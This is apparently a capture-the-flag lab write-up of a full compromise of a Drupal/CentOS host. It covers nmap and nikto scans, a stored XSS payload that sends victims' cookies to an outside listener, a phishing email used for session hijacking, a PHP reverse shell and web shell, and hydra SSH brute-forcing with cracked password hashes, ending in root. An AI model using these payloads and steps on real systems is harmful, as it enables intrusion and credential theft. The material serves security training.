Report http://172.16.11.181:
  • First Step is scan the application, Nmap / Nikto:
  1. nmap -sV 172.16.11.181
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.5
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp Symantec Enterprise Security manager smtpd
80/tcp open http Apache httpd 2.2.3 ((CentOS))
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
3306/tcp open mysql MySQL (unauthorized)
5801/tcp open vnc-http RealVNC 4.0 (resolution: 400x250; VNC TCP port: 5901)
5802/tcp open vnc-http RealVNC 4.0 (resolution: 400x250; VNC TCP port: 5902)
5901/tcp open vnc VNC (protocol 3.8)
5902/tcp open vnc VNC (protocol 3.8)
5903/tcp open vnc VNC (protocol 3.8)
5904/tcp open vnc VNC (protocol 3.8)
6001/tcp open X11 (access denied)
6002/tcp open X11 (access denied)
6003/tcp open X11 (access denied)
6004/tcp open X11 (access denied)
Service Info: Host: localhost.localdomain; OS: Unix Cent OS
  1. nikto -h 172.16.11.181
+ Server: Apache/2.2.3 (CentOS)
+ Retrieved x-powered-by header: PHP/5.1.6
+ OSVDB-3268: /scripts/: Directory indexing found.
+ robots.txt contains 36 entries which should be manually viewed.
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.2.19). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ ETag header found on server, fields: 0x0f09ceda40c2bc564fc7b1c947d96711
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-44056: /sips/sipssys/users/a/admin/user: SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.
+ OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3931: /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent: myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2946: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3233: /phpinfo.php: Contains PHP configuration information
+ OSVDB-4806: /support/messages: Axis WebCam allows retrieval of messages file (/var/log/messages). See http://www.websec.org/adv/axis2400.txt.html
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /marketing/: This might be interesting...
+ OSVDB-3268: /misc/: Directory indexing found.
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /sales/: This might be interesting...
+ OSVDB-3092: /support/: This might be interesting...
+ OSVDB-3092: /user/: This might be interesting...
+ OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3093: /mail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /webmail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3092: /scripts/showuser.cgi: Shows the output of the 'whoami' command, which shows the web server user.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /webmail/src/configtest.php: Squirrelmail configuration test may reveal version and system info.
+ OSVDB-3268: /sites/: Directory indexing found.
+ 6456 items checked: 1 error(s) and 41 item(s) reported on remote host
+ End Time: 2017-02-20 18:05:24 (537 seconds)

More Information:
/webmail/src/read_body.php
SquirrelMail version 1.4.8-21.el5.centos
By the SquirrelMail Project Team

XML-RPC server accepts POST requests only.
CentOS
Apache 2.2
  1. Checking the website (View source, create a new account, buttons etc...)
    * insert a script to the search box and check the source (the script is filtered).
    * find more information about the system via source code.
    * The application is base on Drupal System (theme is /themes/algaglas).
    * Retrieved x-powered-by header: PHP/5.1.6 so
    check the check phpinfo.
    * Create a new user, log in and look after new options:
    * All the users have an ID (The first is Admin).
    * All the pages have an ID (Hidden Page has 28).
    * There are only 2 users who wrote articles in the website:
    (Barbara from marketing and Steave from Executives).
  2. XSS
    * add a command.
    * add a command with an alert <script>alert()</script>
    (Working!)
    * The website has Users that mean we can get a cookie of someone else with higher permissions than me. I prefer Steve because he has higher position.
    * paste a comment with script in one of his articles and wait:
    <script>new Image().src="http://172.16.3.3:1234/a.php?cookie="+encodeURI(document.cookie);</script>


* There is a contact option; we can send emails to other users, ask them to visit in the page, check our social engineering skills :) and take their session.
* send an email to Steave and wait:
hello steve my name is lior i dont understand what you wrote in line number 5 in this article please check and let me know
Thanks

* The SSED of Steve is SESS86615d91cc2c2a92d23dfb632b363094=fi9ptbbvdc17iaprlchiajeqt7

We logged in as Steve :)

* Now, I will add admin Privileges to my user! No need cookies anymore :)
* Check the website with higher permissions.
* In every page there is an option to change the input format, change to php.


* insert a php code and check the page: (Working!)
<?php
phpinfo()
?>



* insert a php reverse shell code and web application shell code (wso).
* in the php reverse shell I don’t have enough permissions, keep going with wso.





* The wso is working writable but there is no option to upload files, so we need to download the web application shell code direcltly to the local machine.
Cd to the file use SimpleHTTPServer and use wget to download it to a writeable place. Run the file.



Check the /etc/Passwd file:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
jharraway:x:500:504::/home/jharraway:/bin/bash
spinkton:x:501:505::/home/spinkton:/bin/bash
sholden:x:502:506::/home/sholden:/bin/bash
bdio:x:503:507::/home/bdio:/bin/bash
jalderman:x:504:508::/home/jalderman:/bin/bash
gconnor:x:505:509::/home/gconnor:/bin/bash
sswiney:x:506:510::/home/sswiney:/bin/bash
dhart:x:507:511::/home/dhart:/bin/bash
gprune:x:508:512::/home/gprune:/bin/bash
hplink:x:509:513::/home/hplink:/bin/bash
jgrimes:x:510:514::/home/jgrimes:/bin/bash
shunter:x:511:515::/home/shunter:/bin/bash
jingersol:x:512:516::/home/jingersol:/bin/bash
mswanson:x:513:517::/home/mswanson:/bin/bash
jstone:x:514:518::/home/jstone:/bin/bash
jgoldman:x:515:519::/home/jgoldman:/bin/bash
tmaloney:x:516:520::/home/tmaloney:/bin/bash
xbruce:x:517:521::/home/xbruce:/bin/bash
sloreman:x:518:522:#flag#5b650c18929383074fea8870d857dd2e:/home/sloreman:/bin/bash

Nikto scanning find an install.php file
+ OSVDB-3092: /install.php: install.php file found.
There is a note: To install to a different database, edit the appropriate settings.php file in the sites folder.


* Now, we have more permissions.
Search in Google what is the configuration file of Drupal and find him:
(settings.php)

* check the settings.php file:



$db_url = 'mysqli://root:JumpUpAndDown@localhost/drupal';
$db_prefix = '';
Mysql User: root
Mysql Password: JumpUpAndDown

Connect to Sql and find information:



In user file there is all the users and hashes to the application
SELECT concat(name,':',pass) FROM `users` LIMIT 0,30
2 ways to find all the passwords, john tusers --format=Raw-MD5 and crackstation


Dan:8f75ad3f04fc42f07c95e2f3d0ec3503:BaseballSeason
Jim:2a5de0f53b1317f7e36afcdb6b5202a4:letmein!
Barbara:bed128365216c019988915ed3add75fb:passw0rd
Xavier:3005d829eb819341357bfddf541c175b:thundercats
Jeff:ca594f739e257245f2be69eb546c1c04:sitepass
George:ed2b1f468c5f915f3f1cf75d7068baae:12341234
Tom:971dcf53e88e9268714d9d504753d347:drupalpassword
John:518462cd3292a67c755521c1fb50c909:4summer13
Sally:7a1c07ff60f9c07ffe8da34ecbf4edc2:fantasy
Steve:08d15a4aef553492d8971cdd5198f314:drupal
Johnathan:6dc523ebd2379d96cc0af32e2d224db0:1loveU
lior:e10adc3949ba59abbe56e057f20f883e:123456
Susan:0d42223010b69cab86634bc359ed870b:BobMarley
admin:49265c16d1dff8acef3499bd889299d6:football123
Stacey:85aca385eb555fb6a36a62915ddd8bc7:Seventy70
Sherry:c3319d1016a802db86653bcfab871f4f:1website
Juan:573152cc51de19df50e90b0e557db7fe:swanson
Michael:c7a4476fc64b75ead800da9ea2b7d072:cherry

Make a file with etc/passwd users and another file with Application’s passwords and try to hack.hydra -L tusers -P tpasswords ssh://172.16.11.181


Users were found:
Username: jharraway Password: letmein!
Username: bdio Password: passw0rd
Username: spinkton Password: football123

Try to log in to all of them and make file with sudo.

  1. Username: jharraway Password: letmein!



    Not Working!

  2. Username: bdio Password: passw0rd



    Not Working!
  3. Username: spinkton Password: football123


Working!
Try sudo su:


I AM R-O-O-T!!

Flags:
1. #flag#550e1bafe077ff0b0b67f4e32f29d751 (View Source)
2. #flag#57dbe55b42b307fb4115146d239955d0 (http://172.16.11.181/node/28/)
3. #flag#550e1bafe077ff0b0b67f4e32f29d751 (phpinfo.php)
4. #flag#5b650c18929383074fea8870d857dd2e (/etc/passwd - sloreman)
5. #flag#5e937c51b852e1ee90d42ddb5ccb8997 (ssh root, and all the other users)
6. #flag#fd38e201f27e98e13abcf62890c43303 (sql admin hash)
7. #flag#5e937c51b852e1ee90d42ddb5ccb8997 (bio + jharraway ssh)
8. #flag#motd-flag (bdio + jharraway ssh)
9. #flag#0ab251c07822d26b07b88136739ae39b (spinkton user)
Share To:

Fabio Lior Rahamim